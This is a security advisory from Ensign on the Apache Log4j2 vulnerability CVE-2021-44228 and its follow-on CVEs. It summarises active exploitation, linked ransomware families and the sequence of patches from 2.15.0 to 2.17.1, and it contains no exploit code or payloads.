The Situation
A recently disclosed critical security vulnerability (CVE-2021-44228) in a logging software, Apache log4j2, is one of the most serious cyber security vulnerabilities in recent years. Apache log4j is widely used in many applications across many organisations. All organisations must act quickly to identify and contain the risks, detect attack attempts and remediate their systems because it is widely used and easily exploitable.
Since the disclosure, the vulnerability has been observed to be under active exploitation by cyber attackers. Many organisations across various sectors are vulnerable because the use of log4j is ubiquitous and the vulnerability is easy to exploit. Financially motivated attackers were among the first to exploit targets, and it is highly anticipated that there will be increased exploitation attempts leading to monetisation activities. This includes data theft and ransomware deployment.
Services and products that leverage on the Apache logging framework are working to put up a fix and are communicating the impact to their customers. At the time of writing, some of the services and applications have been patched or had workarounds implemented to mitigate the vulnerability.
Hackers are actively scanning the internet for affected systems, and there are developed tools to automatically attempt to exploit the vulnerability. The original exploit targets the Java Naming and Directory Interface (JNDI) and the Lightweight Directory Access Protocol (LDAP), enabling attackers to load arbitrary Java code on a server, allowing them to take control. Increasingly, many organisations already have been targeted in activity seeking to exploit the Log4j flaw. New variations of the original exploit which was first posted on GitHub are being introduced at a rapid pace.
Malware strains, botnet malware, crypto-mining malware, email-based attacks leveraging on the Log4j vulnerability are rampant. There are also reports on the increased usage for the attack exploits in ransomware deployment. The first disclosed ransomware, Khonsari, targets Windows systems. TellYouThePass which was a largely inactive ransomware family, has been revived following the log4j vulnerability discovery. TellYouThePass has versions that run in either Linux or Windows. At the time of writing there has been no public disclosure of a successful ransomware breach that exploited the vulnerability in Log4j. Log4j exploits attempts were observed to make connections to known malicious Cobalt Strike servers – a popular tool used for malicious hacking, enabling activities such as remote reconnaissance and lateral movement.
Apache attempted to address the vulnerability with the release of log4j 2.15.0 on 10 Dec. However, the fix to address the vulnerability was incomplete in certain non-default configurations. Apache urgently released a patch log4j 2.16.0 https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0) for the vulnerability by removing support for message lookup patterns and disabling the JNDI functionality by default. With this release, a second disclosed vulnerability of lower severity (CVE-2021-45046 Thread Context Message Pattern and Context Lookup Pattern vulnerable to DOS) was also resolved.
On 18 Dec, the version log4j 2.17.0 (Java 8 and later) (https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.0) was rolled out. This version resolved a denial-of-service (DOS) vulnerability (CVE-2021-45105) which could be triggered when a non-default Pattern Layout with a Context Lookup was used in the logging configuration.
On 27 Dec, the newest release log4j 2.17.1 (Java 8 and later) (https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1) was rolled out. This version resolved a remote code execution (RCE) vulnerability (CVE-2021-44832) rated ‘Moderate’ in severity and had a score of 6.6 on the CVSS scale. The patch addressed the vulnerability by limiting JNDI data source names to the java protocol.
Ensign Posture & Monitoring
The vulnerability does not affect Ensign’s infrastructure.
Ensign has stepped up monitoring operations as part of ongoing vigilance and will advise clients of any anomalous cyber activities detected.
Our Recommendations
While many vulnerable services and products are still working on putting up a fix, there are some proactive steps you can take:
[Identify]
[Contain]
[Detect]
[Tactical Remediation]
[Related software and vendor bulletins]
Ensign will continue to provide updates on this vulnerability, and keep you informed of any additional recommendations. If you require further assistance, please contact us at marketing@ensigninfosecurity.com.
References
https://logging.apache.org/log4j/2.x/security.html
https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/
https://threatpost.com/log4j-attacks-state-actors-worm/177088/
https://blog.sygnia.co/log4shell-remote-code-execution-advisory
https://www.mandiant.com/resources/log4shell-recommendations